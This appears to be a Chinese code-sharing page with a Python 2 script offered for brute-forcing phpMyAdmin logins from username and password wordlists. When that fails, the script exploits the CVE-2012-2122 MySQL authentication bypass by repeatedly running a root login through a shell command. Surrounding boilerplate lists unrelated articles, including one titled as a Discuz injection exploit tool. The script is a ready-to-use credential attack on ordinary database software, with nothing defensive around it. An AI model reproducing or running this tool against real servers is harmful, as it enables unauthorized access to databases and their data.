Python写的PHPMyAdmin暴力破解工具代码


Posted in Python onAugust 06, 2014

PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def Crack(url,username,password):
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) 
	headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.Request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
		return username,password
	return 0
def MySQLAuthenticationBypassCheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
		print "#author:iswin\n#useage python pma.py https://3water.com/phpmyadmin/ username.txt password.txt"
		sys.exit()
	print "Bruting,Pleas wait..."
	for name in open(sys.argv[2],"r"):
		for passw in open(sys.argv[3],"r"):
			state=Crack(sys.argv[1],name,passw)
			if state!=0:
				print "\nBrute successful"
				print "UserName: "+state[0]+"PassWord: "+state[1]
				sys.exit()
	print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
	choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')
	if choice=='Y' or choice=='y':
		host=raw_input('Host:')
		port=raw_input('Port:')
		MySQLAuthenticationBypassCheck(host,port)
Python 相关文章推荐
Python中使用socket发送HTTP请求数据接收不完整问题解决方法
Feb 04 Python
python实现一次创建多级目录的方法
May 15 Python
Python中Class类用法实例分析
Nov 12 Python
python itchat实现微信好友头像拼接图的示例代码
Aug 14 Python
基于Python log 的正确打开方式
Apr 28 Python
python下载卫星云图合成gif的方法示例
Feb 18 Python
python编程进阶之异常处理用法实例分析
Feb 21 Python
Python如何执行精确的浮点数运算
Jul 31 Python
python时间序列数据转为timestamp格式的方法
Aug 03 Python
python批量修改交换机密码的示例
Sep 22 Python
Python中Yield的基本用法
Oct 18 Python
python基于tkinter制作无损音乐下载工具
Mar 29 Python
Python写的Discuz7.2版faq.php注入漏洞工具
Aug 06 #Python
Python常用列表数据结构小结
Aug 06 #Python
Python生成pdf文件的方法
Aug 04 #Python
Tornado Web服务器多进程启动的2个方法
Aug 04 #Python
Python通过解析网页实现看报程序的方法
Aug 04 #Python
基于Python实现的扫雷游戏实例代码
Aug 01 #Python
python脚本实现查找webshell的方法
Jul 31 #Python
You might like
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
2010/06/09 PHP
PHP邮件发送类PHPMailer用法实例详解
2014/09/22 PHP
PHP实现批量生成App各种尺寸Logo
2015/03/19 PHP
php把大写命名转换成下划线分割命名
2015/04/27 PHP
详谈php静态方法及普通方法的区别
2016/10/04 PHP
tp5框架的增删改查操作示例
2019/10/31 PHP
jquery $.ajax相关用法分享
2012/03/16 Javascript
JS 获取select(多选下拉)中所选值的示例代码
2013/08/02 Javascript
一款基jquery超炫的动画导航菜单可响应单击事件
2014/11/02 Javascript
Bootstrap每天必学之警告框插件
2016/04/26 Javascript
JS实现图片的不间断连续滚动的简单实例
2016/06/03 Javascript
domReady的实现案例
2016/11/23 Javascript
有关suggest快速删除后仍然出现下拉列表的bug问题
2016/12/02 Javascript
js实现复制功能(多种方法集合)
2018/01/06 Javascript
Vue批量图片显示时遇到的路径被解析问题
2019/03/28 Javascript
微信小程序修改checkbox的样式代码实例
2020/01/21 Javascript
vue 动态添加class,三个以上的条件做判断方式
2020/11/02 Javascript
JS中多层次排序算法的实现代码
2021/01/06 Javascript
python网络编程学习笔记(五):socket的一些补充
2014/06/09 Python
python实现从网络下载文件并获得文件大小及类型的方法
2015/04/28 Python
Python的Scrapy爬虫框架简单学习笔记
2016/01/20 Python
python 实现数字字符串左侧补零的方法
2018/12/04 Python
python开发游戏的前期准备
2019/05/05 Python
pip 安装库比较慢的解决方法(国内镜像)
2019/10/06 Python
Pytorch转keras的有效方法,以FlowNet为例讲解
2020/05/26 Python
Python之多进程与多线程的使用
2021/02/23 Python
Yves Rocher捷克官方网站:植物化妆品的创造者
2019/07/31 全球购物
JSF如何进行表格处理及取值
2012/08/06 面试题
汽车专业毕业生推荐信
2013/11/12 职场文书
初级会计求职信范文
2014/02/15 职场文书
十一国庆节“向国旗敬礼”主题班会活动方案
2014/09/27 职场文书
新学期红领巾广播稿
2014/10/04 职场文书
教师批评与自我批评总结
2014/10/16 职场文书
新闻简讯格式及范文
2015/07/22 职场文书
保护环境建议书作文500字
2015/09/14 职场文书
HTML常用标签超详细整理
2022/03/19 HTML / CSS